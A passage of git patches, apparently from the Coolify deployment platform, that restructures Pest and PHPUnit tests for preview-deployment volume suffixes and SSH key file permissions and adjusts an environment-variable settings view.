 
-    // Find the bind mount handling block (type === 'bind')
-    $bindBlockStart = strpos($parsersFile, "if (\$type->value() === 'bind')");
-    $volumeBlockStart = strpos($parsersFile, "} elseif (\$type->value() === 'volume')");
-    $bindBlock = substr($parsersFile, $bindBlockStart, $volumeBlockStart - $bindBlockStart);
+    it('returns name unchanged when pull request id is zero', function () {
+        expect(addPreviewDeploymentSuffix('myvolume', 0))->toBe('myvolume');
+    });
 
-    // Bind mount block should check is_preview_suffix_enabled before applying suffix
-    expect($bindBlock)
-        ->toContain('$isPreviewSuffixEnabled')
-        ->toContain('is_preview_suffix_enabled')
-        ->toContain('addPreviewDeploymentSuffix');
+    it('handles pull request id of 1', function () {
+        expect(addPreviewDeploymentSuffix('scripts', 1))->toBe('scripts-pr-1');
+    });
+
+    it('handles large pull request ids', function () {
+        expect(addPreviewDeploymentSuffix('data', 9999))->toBe('data-pr-9999');
+    });
+
+    it('handles names with dots and slashes', function () {
+        expect(addPreviewDeploymentSuffix('./scripts', 2))->toBe('./scripts-pr-2');
+    });
+
+    it('handles names with existing hyphens', function () {
+        expect(addPreviewDeploymentSuffix('my-volume-name', 5))->toBe('my-volume-name-pr-5');
+    });
+
+    it('handles empty name with non-zero pr id', function () {
+        expect(addPreviewDeploymentSuffix('', 1))->toBe('-pr-1');
+    });
+
+    it('handles uuid-prefixed volume names', function () {
+        $uuid = 'abc123_my-volume';
+        expect(addPreviewDeploymentSuffix($uuid, 7))->toBe('abc123_my-volume-pr-7');
+    });
+
+    it('defaults pull_request_id to 0', function () {
+        expect(addPreviewDeploymentSuffix('myvolume'))->toBe('myvolume');
+    });
 });
 
-it('still applies preview deployment suffix to named volume paths', function () {
-    $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+describe('sourceIsLocal', function () {
+    it('detects relative paths starting with dot-slash', function () {
+        expect(sourceIsLocal(str('./scripts')))->toBeTrue();
+    });
 
-    // Find the named volume handling block (type === 'volume')
-    $volumeBlockStart = strpos($parsersFile, "} elseif (\$type->value() === 'volume')");
-    $volumeBlock = substr($parsersFile, $volumeBlockStart, 1000);
+    it('detects absolute paths starting with slash', function () {
+        expect(sourceIsLocal(str('/var/data')))->toBeTrue();
+    });
 
-    // Named volumes SHOULD still get the -pr-N suffix for isolation
-    expect($volumeBlock)->toContain('addPreviewDeploymentSuffix');
+    it('detects tilde paths', function () {
+        expect(sourceIsLocal(str('~/data')))->toBeTrue();
+    });
+
+    it('detects parent directory paths', function () {
+        expect(sourceIsLocal(str('../config')))->toBeTrue();
+    });
+
+    it('returns false for named volumes', function () {
+        expect(sourceIsLocal(str('myvolume')))->toBeFalse();
+    });
 });
 
-it('confirms addPreviewDeploymentSuffix works correctly', function () {
-    $result = addPreviewDeploymentSuffix('myvolume', 3);
-    expect($result)->toBe('myvolume-pr-3');
+describe('replaceLocalSource', function () {
+    it('replaces dot-slash prefix with target path', function () {
+        $result = replaceLocalSource(str('./scripts'), str('/app'));
+        expect((string) $result)->toBe('/app/scripts');
+    });
 
-    $result = addPreviewDeploymentSuffix('myvolume', 0);
-    expect($result)->toBe('myvolume');
+    it('replaces dot-dot-slash prefix with target path', function () {
+        $result = replaceLocalSource(str('../config'), str('/app'));
+        expect((string) $result)->toBe('/app./config');
+    });
+
+    it('replaces tilde prefix with target path', function () {
+        $result = replaceLocalSource(str('~/data'), str('/app'));
+        expect((string) $result)->toBe('/app/data');
+    });
 });
 
 /**
- * Tests for GitHub issue #7343: $uuid mutation in label generation leaks into
- * subsequent services' volume paths during preview deployments.
+ * Source-code structure tests for parser and deployment job.
  *
- * The label generation block must use a local variable ($labelUuid) instead of
- * mutating the shared $uuid variable, which is used for volume base paths.
+ * These verify that key code patterns exist in the parser and deployment job.
+ * They are intentionally text-based because the parser/deployment functions
+ * require database-persisted models with deep relationships, making behavioral
+ * unit tests impractical. Full behavioral coverage should be done via Feature tests.
  */
-it('does not mutate shared uuid variable during label generation', function () {
-    $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+describe('parser structure: bind mount handling', function () {
+    it('checks is_preview_suffix_enabled before applying suffix', function () {
+        $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
 
-    // Find the FQDN label generation block
-    $labelBlockStart = strpos($parsersFile, '$shouldGenerateLabelsExactly = $resource->destination->server->settings->generate_exact_labels;');
-    $labelBlock = substr($parsersFile, $labelBlockStart, 300);
+        $bindBlockStart = strpos($parsersFile, "if (\$type->value() === 'bind')");
+        $volumeBlockStart = strpos($parsersFile, "} elseif (\$type->value() === 'volume')");
+        $bindBlock = substr($parsersFile, $bindBlockStart, $volumeBlockStart - $bindBlockStart);
 
-    // Should use $labelUuid, not mutate $uuid
-    expect($labelBlock)
-        ->toContain('$labelUuid = $resource->uuid')
-        ->not->toContain('$uuid = $resource->uuid')
-        ->not->toContain("\$uuid = \"{$resource->uuid}");
+        expect($bindBlock)
+            ->toContain('$isPreviewSuffixEnabled')
+            ->toContain('is_preview_suffix_enabled')
+            ->toContain('addPreviewDeploymentSuffix');
+    });
+
+    it('applies preview suffix to named volumes', function () {
+        $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+
+        $volumeBlockStart = strpos($parsersFile, "} elseif (\$type->value() === 'volume')");
+        $volumeBlock = substr($parsersFile, $volumeBlockStart, 1000);
+
+        expect($volumeBlock)->toContain('addPreviewDeploymentSuffix');
+    });
 });
 
-it('uses labelUuid in all proxy label generation calls', function () {
-    $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+describe('parser structure: label generation uuid isolation', function () {
+    it('uses labelUuid instead of mutating shared uuid', function () {
+        $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
 
-    // Find the FQDN label generation block (from shouldGenerateLabelsExactly to the closing brace)
-    $labelBlockStart = strpos($parsersFile, '$shouldGenerateLabelsExactly');
-    $labelBlockEnd = strpos($parsersFile, "data_forget(\$service, 'volumes.*.content')");
-    $labelBlock = substr($parsersFile, $labelBlockStart, $labelBlockEnd - $labelBlockStart);
+        $labelBlockStart = strpos($parsersFile, '$shouldGenerateLabelsExactly = $resource->destination->server->settings->generate_exact_labels;');
+        $labelBlock = substr($parsersFile, $labelBlockStart, 300);
 
-    // All uuid references in label functions should use $labelUuid
-    expect($labelBlock)
-        ->toContain('uuid: $labelUuid')
-        ->not->toContain('uuid: $uuid');
+        expect($labelBlock)
+            ->toContain('$labelUuid = $resource->uuid')
+            ->not->toContain('$uuid = $resource->uuid')
+            ->not->toContain('$uuid = "{$resource->uuid}');
+    });
+
+    it('uses labelUuid in all proxy label generation calls', function () {
+        $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+
+        $labelBlockStart = strpos($parsersFile, '$shouldGenerateLabelsExactly');
+        $labelBlockEnd = strpos($parsersFile, "data_forget(\$service, 'volumes.*.content')");
+        $labelBlock = substr($parsersFile, $labelBlockStart, $labelBlockEnd - $labelBlockStart);
+
+        expect($labelBlock)
+            ->toContain('uuid: $labelUuid')
+            ->not->toContain('uuid: $uuid');
+    });
 });
 
-it('checks is_preview_suffix_enabled in deployment job for persistent volumes', function () {
-    $deploymentJobFile = file_get_contents(__DIR__.'/../../app/Jobs/ApplicationDeploymentJob.php');
+describe('deployment job structure: is_preview_suffix_enabled', function () {
+    it('checks setting in generate_local_persistent_volumes', function () {
+        $deploymentJobFile = file_get_contents(__DIR__.'/../../app/Jobs/ApplicationDeploymentJob.php');
 
-    // Find the generate_local_persistent_volumes method
-    $methodStart = strpos($deploymentJobFile, 'function generate_local_persistent_volumes()');
-    $methodEnd = strpos($deploymentJobFile, 'function generate_local_persistent_volumes_only_volume_names()');
-    $methodBlock = substr($deploymentJobFile, $methodStart, $methodEnd - $methodStart);
+        $methodStart = strpos($deploymentJobFile, 'function generate_local_persistent_volumes()');
+        $methodEnd = strpos($deploymentJobFile, 'function generate_local_persistent_volumes_only_volume_names()');
+        $methodBlock = substr($deploymentJobFile, $methodStart, $methodEnd - $methodStart);
 
-    // Should check is_preview_suffix_enabled before applying suffix
-    expect($methodBlock)
-        ->toContain('is_preview_suffix_enabled')
-        ->toContain('$isPreviewSuffixEnabled')
-        ->toContain('addPreviewDeploymentSuffix');
-});
-
-it('checks is_preview_suffix_enabled in deployment job for volume names', function () {
-    $deploymentJobFile = file_get_contents(__DIR__.'/../../app/Jobs/ApplicationDeploymentJob.php');
-
-    // Find the generate_local_persistent_volumes_only_volume_names method
-    $methodStart = strpos($deploymentJobFile, 'function generate_local_persistent_volumes_only_volume_names()');
-    $methodEnd = strpos($deploymentJobFile, 'function generate_healthcheck_commands()');
-    $methodBlock = substr($deploymentJobFile, $methodStart, $methodEnd - $methodStart);
-
-    // Should check is_preview_suffix_enabled before applying suffix
-    expect($methodBlock)
-        ->toContain('is_preview_suffix_enabled')
-        ->toContain('$isPreviewSuffixEnabled')
-        ->toContain('addPreviewDeploymentSuffix');
+        expect($methodBlock)
+            ->toContain('is_preview_suffix_enabled')
+            ->toContain('$isPreviewSuffixEnabled')
+            ->toContain('addPreviewDeploymentSuffix');
+    });
+
+    it('checks setting in generate_local_persistent_volumes_only_volume_names', function () {
+        $deploymentJobFile = file_get_contents(__DIR__.'/../../app/Jobs/ApplicationDeploymentJob.php');
+
+        $methodStart = strpos($deploymentJobFile, 'function generate_local_persistent_volumes_only_volume_names()');
+        $methodEnd = strpos($deploymentJobFile, 'function generate_healthcheck_commands()');
+        $methodBlock = substr($deploymentJobFile, $methodStart, $methodEnd - $methodStart);
+
+        expect($methodBlock)
+            ->toContain('is_preview_suffix_enabled')
+            ->toContain('$isPreviewSuffixEnabled')
+            ->toContain('addPreviewDeploymentSuffix');
+    });
 });

From b448322a0c371a17fb696f28bfeb298350a68201 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 21:22:42 +0100
Subject: [PATCH 080/213] docs(sponsors): add ScreenshotOne as a huge sponsor

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index b2d622167..b7aefe16a 100644
--- a/README.md
+++ b/README.md
@@ -59,6 +59,7 @@ ### Huge Sponsors
 
 * [MVPS](https://www.mvps.net?ref=coolify.io) - Cheap VPS servers at the highest possible quality
 * [SerpAPI](https://serpapi.com?ref=coolify.io) - Google Search API — Scrape Google and other search engines from our fast, easy, and complete API
+* [ScreenshotOne](https://screenshotone.com?ref=coolify.io) - Screenshot API for devs
 *
 
 ### Big Sponsors

From 6325e41aec29e5e02e16f0b8df0dbc1ae5b38531 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 21:27:10 +0100
Subject: [PATCH 081/213] fix(ssh): handle chmod failures gracefully and
 simplify key management

- Log warnings instead of silently failing when chmod 0600 fails
- Remove redundant refresh() call before SSH key validation
- Remove storeInFileSystem() call from updatePrivateKey() transaction
- Remove @unlink() of lock file after filesystem store
- Refactor unit tests to use real temp disk and anonymous class stub
  instead of reflection-only checks
---
 app/Helpers/SshMultiplexingHelper.php |   9 +-
 app/Models/PrivateKey.php             |  17 +-
 tests/Unit/SshKeyValidationTest.php   | 267 ++++++++++++++------------
 3 files changed, 155 insertions(+), 138 deletions(-)

diff --git a/app/Helpers/SshMultiplexingHelper.php b/app/Helpers/SshMultiplexingHelper.php
index b9a3e98f3..aa9d06996 100644
--- a/app/Helpers/SshMultiplexingHelper.php
+++ b/app/Helpers/SshMultiplexingHelper.php
@@ -209,8 +209,6 @@ private static function isMultiplexingEnabled(): bool
 
     private static function validateSshKey(PrivateKey $privateKey): void
     {
-        $privateKey->refresh();
-
         $keyLocation = $privateKey->getKeyLocation();
         $filename = "ssh_key@{$privateKey->uuid}";
         $disk = Storage::disk('ssh-keys');
@@ -236,8 +234,11 @@ private static function validateSshKey(PrivateKey $privateKey): void
         // Ensure correct permissions (SSH requires 0600)
         if (file_exists($keyLocation)) {
             $currentPerms = fileperms($keyLocation) & 0777;
-            if ($currentPerms !== 0600) {
-                chmod($keyLocation, 0600);
+            if ($currentPerms !== 0600 && ! chmod($keyLocation, 0600)) {
+                Log::warning('Failed to set SSH key file permissions to 0600', [
+                    'key_uuid' => $privateKey->uuid,
+                    'path' => $keyLocation,
+                ]);
             }
         }
     }
diff --git a/app/Models/PrivateKey.php b/app/Models/PrivateKey.php
index b453e999d..1521678f3 100644
--- a/app/Models/PrivateKey.php
+++ b/app/Models/PrivateKey.php
@@ -5,6 +5,7 @@
 use App\Traits\HasSafeStringAttribute;
 use DanHarrin\LivewireRateLimiting\WithRateLimiting;
 use Illuminate\Support\Facades\DB;
+use Illuminate\Support\Facades\Log;
 use Illuminate\Support\Facades\Storage;
 use Illuminate\Validation\ValidationException;
 use OpenApi\Attributes as OA;
@@ -71,7 +72,7 @@ protected static function booted()
                     $key->storeInFileSystem();
                     refresh_server_connection($key);
                 } catch (\Exception $e) {
-                    \Illuminate\Support\Facades\Log::error('Failed to resync SSH key after update', [
+                    Log::error('Failed to resync SSH key after update', [
                         'key_uuid' => $key->uuid,
                         'error' => $e->getMessage(),
                     ]);
@@ -235,15 +236,17 @@ public function storeInFileSystem()
             }
 
             // Ensure correct permissions for SSH (0600 required)
-            if (file_exists($keyLocation)) {
-                chmod($keyLocation, 0600);
+            if (file_exists($keyLocation) && ! chmod($keyLocation, 0600)) {
+                Log::warning('Failed to set SSH key file permissions to 0600', [
+                    'key_uuid' => $this->uuid,
+                    'path' => $keyLocation,
+                ]);
             }
 
             return $keyLocation;
         } finally {
             flock($lockHandle, LOCK_UN);
             fclose($lockHandle);
-            @unlink($lockFile);
         }
     }
 
@@ -291,12 +294,6 @@ public function updatePrivateKey(array $data)
         return DB::transaction(function () use ($data) {
             $this->update($data);
 
-            try {
-                $this->storeInFileSystem();
-            } catch (\Exception $e) {
-                throw new \Exception('Failed to update SSH key: '.$e->getMessage());
-            }
-
             return $this;
         });
     }
diff --git a/tests/Unit/SshKeyValidationTest.php b/tests/Unit/SshKeyValidationTest.php
index fbcf7725d..adc6847d1 100644
--- a/tests/Unit/SshKeyValidationTest.php
+++ b/tests/Unit/SshKeyValidationTest.php
@@ -20,126 +20,26 @@
  */
 class SshKeyValidationTest extends TestCase
 {
-    public function test_validate_ssh_key_method_exists()
+    private string $diskRoot;
+
+    protected function setUp(): void
     {
-        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
-        $this->assertTrue($reflection->isStatic(), 'validateSshKey should be a static method');
-    }
+        parent::setUp();
 
-    public function test_validate_ssh_key_accepts_private_key_parameter()
-    {
-        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
-        $parameters = $reflection->getParameters();
-
-        $this->assertCount(1, $parameters);
-        $this->assertEquals('privateKey', $parameters[0]->getName());
-
-        $type = $parameters[0]->getType();
-        $this->assertNotNull($type);
-        $this->assertEquals(PrivateKey::class, $type->getName());
-    }
-
-    public function test_store_in_file_system_sets_correct_permissions()
-    {
-        // Verify that storeInFileSystem enforces chmod 0600 via code inspection
-        $reflection = new \ReflectionMethod(PrivateKey::class, 'storeInFileSystem');
-        $this->assertTrue(
-            $reflection->isPublic(),
-            'storeInFileSystem should be public'
-        );
-
-        // Verify the method source contains chmod for 0600
-        $filename = $reflection->getFileName();
-        $startLine = $reflection->getStartLine();
-        $endLine = $reflection->getEndLine();
-        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
-
-        $this->assertStringContainsString('chmod', $source, 'storeInFileSystem should set file permissions');
-        $this->assertStringContainsString('0600', $source, 'storeInFileSystem should enforce 0600 permissions');
-    }
-
-    public function test_store_in_file_system_uses_file_locking()
-    {
-        // Verify the method uses flock to prevent race conditions
-        $reflection = new \ReflectionMethod(PrivateKey::class, 'storeInFileSystem');
-        $filename = $reflection->getFileName();
-        $startLine = $reflection->getStartLine();
-        $endLine = $reflection->getEndLine();
-        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
-
-        $this->assertStringContainsString('flock', $source, 'storeInFileSystem should use file locking');
-        $this->assertStringContainsString('LOCK_EX', $source, 'storeInFileSystem should use exclusive locks');
-    }
-
-    public function test_validate_ssh_key_checks_content_not_just_existence()
-    {
-        // Verify validateSshKey compares file content with DB value
-        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
-        $filename = $reflection->getFileName();
-        $startLine = $reflection->getStartLine();
-        $endLine = $reflection->getEndLine();
-        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
-
-        // Should read file content and compare, not just check existence with `ls`
-        $this->assertStringNotContainsString('ls $keyLocation', $source, 'Should not use ls to check key existence');
-        $this->assertStringContainsString('private_key', $source, 'Should compare against DB key content');
-        $this->assertStringContainsString('refresh', $source, 'Should refresh key from database');
-    }
-
-    public function test_server_model_detects_private_key_id_changes()
-    {
-        // Verify the Server model's saved event checks for private_key_id changes
-        $reflection = new \ReflectionMethod(\App\Models\Server::class, 'booted');
-        $filename = $reflection->getFileName();
-        $startLine = $reflection->getStartLine();
-        $endLine = $reflection->getEndLine();
-        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
-
-        $this->assertStringContainsString(
-            'wasChanged',
-            $source,
-            'Server saved event should detect private_key_id changes via wasChanged()'
-        );
-        $this->assertStringContainsString(
-            'private_key_id',
-            $source,
-            'Server saved event should specifically check private_key_id'
-        );
-    }
-
-    public function test_private_key_saved_event_resyncs_on_key_change()
-    {
-        // Verify PrivateKey model resyncs file and mux on key content change
-        $reflection = new \ReflectionMethod(PrivateKey::class, 'booted');
-        $filename = $reflection->getFileName();
-        $startLine = $reflection->getStartLine();
-        $endLine = $reflection->getEndLine();
-        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
-
-        $this->assertStringContainsString(
-            "wasChanged('private_key')",
-            $source,
-            'PrivateKey saved event should detect key content changes'
-        );
-        $this->assertStringContainsString(
-            'refresh_server_connection',
-            $source,
-            'PrivateKey saved event should invalidate mux connections'
-        );
-        $this->assertStringContainsString(
-            'storeInFileSystem',
-            $source,
-            'PrivateKey saved event should resync key file'
-        );
-    }
-
-    public function test_validate_ssh_key_rewrites_stale_file_and_fixes_permissions()
-    {
-        $diskRoot = sys_get_temp_dir().'/coolify-ssh-test-'.Str::uuid();
-        File::ensureDirectoryExists($diskRoot);
-        config(['filesystems.disks.ssh-keys.root' => $diskRoot]);
+        $this->diskRoot = sys_get_temp_dir().'/coolify-ssh-test-'.Str::uuid();
+        File::ensureDirectoryExists($this->diskRoot);
+        config(['filesystems.disks.ssh-keys.root' => $this->diskRoot]);
         app('filesystem')->forgetDisk('ssh-keys');
+    }
 
+    protected function tearDown(): void
+    {
+        File::deleteDirectory($this->diskRoot);
+        parent::tearDown();
+    }
+
+    private function makePrivateKey(string $keyContent = 'TEST_KEY_CONTENT'): PrivateKey
+    {
         $privateKey = new class extends PrivateKey
         {
             public int $storeCallCount = 0;
@@ -168,22 +68,141 @@ public function storeInFileSystem()
         };
 
         $privateKey->uuid = (string) Str::uuid();
-        $privateKey->private_key = 'NEW_PRIVATE_KEY_CONTENT';
+        $privateKey->private_key = $keyContent;
+
+        return $privateKey;
+    }
+
+    private function callValidateSshKey(PrivateKey $privateKey): void
+    {
+        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
+        $reflection->setAccessible(true);
+        $reflection->invoke(null, $privateKey);
+    }
+
+    public function test_validate_ssh_key_rewrites_stale_file_and_fixes_permissions()
+    {
+        $privateKey = $this->makePrivateKey('NEW_PRIVATE_KEY_CONTENT');
 
         $filename = "ssh_key@{$privateKey->uuid}";
         $disk = Storage::disk('ssh-keys');
         $disk->put($filename, 'OLD_PRIVATE_KEY_CONTENT');
-        $staleKeyPath = $disk->path($filename);
-        chmod($staleKeyPath, 0644);
+        $keyPath = $disk->path($filename);
+        chmod($keyPath, 0644);
 
-        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
-        $reflection->setAccessible(true);
-        $reflection->invoke(null, $privateKey);
+        $this->callValidateSshKey($privateKey);
 
         $this->assertSame('NEW_PRIVATE_KEY_CONTENT', $disk->get($filename));
         $this->assertSame(1, $privateKey->storeCallCount);
-        $this->assertSame(0600, fileperms($staleKeyPath) & 0777);
+        $this->assertSame(0600, fileperms($keyPath) & 0777);
+    }
 
-        File::deleteDirectory($diskRoot);
+    public function test_validate_ssh_key_creates_missing_file()
+    {
+        $privateKey = $this->makePrivateKey('MY_KEY_CONTENT');
+
+        $filename = "ssh_key@{$privateKey->uuid}";
+        $disk = Storage::disk('ssh-keys');
+        $this->assertFalse($disk->exists($filename));
+
+        $this->callValidateSshKey($privateKey);
+
+        $this->assertTrue($disk->exists($filename));
+        $this->assertSame('MY_KEY_CONTENT', $disk->get($filename));
+        $this->assertSame(1, $privateKey->storeCallCount);
+    }
+
+    public function test_validate_ssh_key_skips_rewrite_when_content_matches()
+    {
+        $privateKey = $this->makePrivateKey('SAME_KEY_CONTENT');
+
+        $filename = "ssh_key@{$privateKey->uuid}";
+        $disk = Storage::disk('ssh-keys');
+        $disk->put($filename, 'SAME_KEY_CONTENT');
+        $keyPath = $disk->path($filename);
+        chmod($keyPath, 0600);
+
+        $this->callValidateSshKey($privateKey);
+
+        $this->assertSame(0, $privateKey->storeCallCount, 'Should not rewrite when content matches');
+        $this->assertSame('SAME_KEY_CONTENT', $disk->get($filename));
+    }
+
+    public function test_validate_ssh_key_fixes_permissions_without_rewrite()
+    {
+        $privateKey = $this->makePrivateKey('KEY_CONTENT');
+
+        $filename = "ssh_key@{$privateKey->uuid}";
+        $disk = Storage::disk('ssh-keys');
+        $disk->put($filename, 'KEY_CONTENT');
+        $keyPath = $disk->path($filename);
+        chmod($keyPath, 0644);
+
+        $this->callValidateSshKey($privateKey);
+
+        $this->assertSame(0, $privateKey->storeCallCount, 'Should not rewrite when content matches');
+        $this->assertSame(0600, fileperms($keyPath) & 0777, 'Should fix permissions even without rewrite');
+    }
+
+    public function test_store_in_file_system_enforces_correct_permissions()
+    {
+        $privateKey = $this->makePrivateKey('KEY_FOR_PERM_TEST');
+        $privateKey->storeInFileSystem();
+
+        $filename = "ssh_key@{$privateKey->uuid}";
+        $keyPath = Storage::disk('ssh-keys')->path($filename);
+
+        $this->assertSame(0600, fileperms($keyPath) & 0777);
+    }
+
+    public function test_store_in_file_system_lock_file_persists()
+    {
+        // Use the real storeInFileSystem to verify lock file behavior
+        $disk = Storage::disk('ssh-keys');
+        $uuid = (string) Str::uuid();
+        $filename = "ssh_key@{$uuid}";
+        $keyLocation = $disk->path($filename);
+        $lockFile = $keyLocation.'.lock';
+
+        $privateKey = new class extends PrivateKey
+        {
+            public function refresh()
+            {
+                return $this;
+            }
+
+            public function getKeyLocation()
+            {
+                return Storage::disk('ssh-keys')->path("ssh_key@{$this->uuid}");
+            }
+
+            protected function ensureStorageDirectoryExists()
+            {
+                // No-op in test — directory already exists
+            }
+        };
+
+        $privateKey->uuid = $uuid;
+        $privateKey->private_key = 'LOCK_TEST_KEY';
+
+        $privateKey->storeInFileSystem();
+
+        // Lock file should persist (not be deleted) to prevent flock race conditions
+        $this->assertFileExists($lockFile, 'Lock file should persist after storeInFileSystem');
+    }
+
+    public function test_server_model_detects_private_key_id_changes()
+    {
+        $reflection = new \ReflectionMethod(\App\Models\Server::class, 'booted');
+        $filename = $reflection->getFileName();
+        $startLine = $reflection->getStartLine();
+        $endLine = $reflection->getEndLine();
+        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
+
+        $this->assertStringContainsString(
+            "wasChanged('private_key_id')",
+            $source,
+            'Server saved event should detect private_key_id changes'
+        );
     }
 }

From ed3b5d096c06434775c144f27cfbf0bc88eb71b7 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 17 Mar 2026 09:52:29 +0100
Subject: [PATCH 082/213] refactor(environment-variable): remove
 buildtime/runtime options and improve comment field

Remove buildtime and runtime availability checkboxes from service-type environment variables across all permission levels. Always show the comment field with a conditional placeholder for magic variables instead of hiding it. Add a lock button for service-type variables.
---
 .../environment-variable/show.blade.php       | 42 +++++--------------
 1 file changed, 10 insertions(+), 32 deletions(-)

diff --git a/resources/views/livewire/project/shared/environment-variable/show.blade.php b/resources/views/livewire/project/shared/environment-variable/show.blade.php
index 86faeeeb4..4db35674a 100644
--- a/resources/views/livewire/project/shared/environment-variable/show.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/show.blade.php
@@ -34,12 +34,6 @@
                     <div class="flex flex-wrap w-full items-center gap-4">
                         @if (!$is_redis_credential)
                             @if ($type === 'service')
-                                <x-forms.checkbox instantSave id="is_buildtime"
-                                    helper="Make this variable available during Docker build process. Useful for build secrets and dependencies."
-                                    label="Available at Buildtime" />
-                                <x-forms.checkbox instantSave id="is_runtime"
-                                    helper="Make this variable available in the running container at runtime."
-                                    label="Available at Runtime" />
                                 @if (!$isMagicVariable)
                                     <x-forms.checkbox instantSave id="is_multiline" label="Is Multiline?" />
                                     <x-forms.checkbox instantSave id="is_literal"
@@ -86,12 +80,6 @@
                     <div class="flex flex-wrap w-full items-center gap-4">
                         @if (!$is_redis_credential)
                             @if ($type === 'service')
-                                <x-forms.checkbox disabled id="is_buildtime"
-                                    helper="Make this variable available during Docker build process. Useful for build secrets and dependencies."
-                                    label="Available at Buildtime" />
-                                <x-forms.checkbox disabled id="is_runtime"
-                                    helper="Make this variable available in the running container at runtime."
-                                    label="Available at Runtime" />
                                 @if (!$isMagicVariable)
                                     <x-forms.checkbox disabled id="is_multiline" label="Is Multiline?" />
                                     <x-forms.checkbox disabled id="is_literal"
@@ -145,10 +133,9 @@
                                 <x-forms.input disabled type="password" id="real_value" />
                             @endif
                         </div>
-                        @if (!$isMagicVariable)
-                            <x-forms.input disabled id="comment" label="Comment"
-                                helper="Add a note to document what this environment variable is used for." maxlength="256" />
-                        @endif
+                        <x-forms.input instantSave id="comment" label="Comment"
+                            placeholder="{{ $isMagicVariable ? 'This env cannot be edited manually, it is handled by Coolify.' : '' }}"
+                            helper="Add a note to document what this environment variable is used for." maxlength="256" />
                     </div>
                 @else
                     <div class="flex flex-col w-full gap-2">
@@ -178,10 +165,9 @@
                             <x-forms.input disabled type="password" id="real_value" />
                         @endif
                     </div>
-                    @if (!$isMagicVariable)
-                        <x-forms.input disabled id="comment" label="Comment"
-                            helper="Add a note to document what this environment variable is used for." maxlength="256" />
-                    @endif
+                    <x-forms.input disabled id="comment" label="Comment"
+                        placeholder="{{ $isMagicVariable ? 'This env cannot be edited manually, it is handled by Coolify.' : '' }}"
+                        helper="Add a note to document what this environment variable is used for." maxlength="256" />
                 </div>
             @endcan
             @can('update', $this->env)
@@ -189,12 +175,6 @@
                     <div class="flex flex-wrap w-full items-center gap-4">
                         @if (!$is_redis_credential)
                             @if ($type === 'service')
-                                <x-forms.checkbox instantSave id="is_buildtime"
-                                    helper="Make this variable available during Docker build process. Useful for build secrets and dependencies."
-                                    label="Available at Buildtime" />
-                                <x-forms.checkbox instantSave id="is_runtime"
-                                    helper="Make this variable available in the running container at runtime."
-                                    label="Available at Runtime" />
                                 @if (!$isMagicVariable)
                                     <x-forms.checkbox instantSave id="is_multiline" label="Is Multiline?" />
                                     <x-forms.checkbox instantSave id="is_literal"
@@ -258,6 +238,10 @@
                                 step2ButtonText="Permanently Delete" />
                             @endif
                         </div>
+                    @elseif ($type === 'service')
+                        <div class="flex w-full justify-end gap-2">
+                            <x-forms.button wire:click='lock'>Lock</x-forms.button>
+                        </div>
                     @endif
                 </div>
             @else
@@ -265,12 +249,6 @@
                     <div class="flex flex-wrap w-full items-center gap-4">
                         @if (!$is_redis_credential)
                             @if ($type === 'service')
-                                <x-forms.checkbox disabled id="is_buildtime"
-                                    helper="Make this variable available during Docker build process. Useful for build secrets and dependencies."
-                                    label="Available at Buildtime" />
-                                <x-forms.checkbox disabled id="is_runtime"
-                                    helper="Make this variable available in the running container at runtime."
-                                    label="Available at Runtime" />
                                 @if (!$isMagicVariable)
                                     <x-forms.checkbox disabled id="is_multiline" label="Is Multiline?" />
                                     <x-forms.checkbox disabled id="is_literal"

From f896d47b99acad04cf10dc94ba2865bf7b68dfca Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 17 Mar 2026 10:11:26 +0100
Subject: [PATCH 083/213] feat(environment-variable): add placeholder hint for
 magic variables

Add a placeholder message to the comment field indicating when an
environment variable is handled by Coolify and cannot be edited manually.
---
 .../livewire/project/shared/environment-variable/show.blade.php  | 1 +
 1 file changed, 1 insertion(+)

diff --git a/resources/views/livewire/project/shared/environment-variable/show.blade.php b/resources/views/livewire/project/shared/environment-variable/show.blade.php
index 4db35674a..d8d448700 100644
--- a/resources/views/livewire/project/shared/environment-variable/show.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/show.blade.php
@@ -26,6 +26,7 @@
                 <div class="flex flex-col w-full gap-2 lg:flex-row lg:items-end">
                     <div class="flex-1">
                         <x-forms.input id="comment" label="Comment"
+                            placeholder="{{ $isMagicVariable ? 'This env cannot be edited manually, it is handled by Coolify.' : '' }}"
                             helper="Add a note to document what this environment variable is used for." maxlength="256" />
                     </div>
                     <x-forms.button type="submit">Update</x-forms.button>

From 23f9156c7306b221101f1ebbe4d3c6b5e2522acd Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 18 Mar 2026 13:53:01 +0100
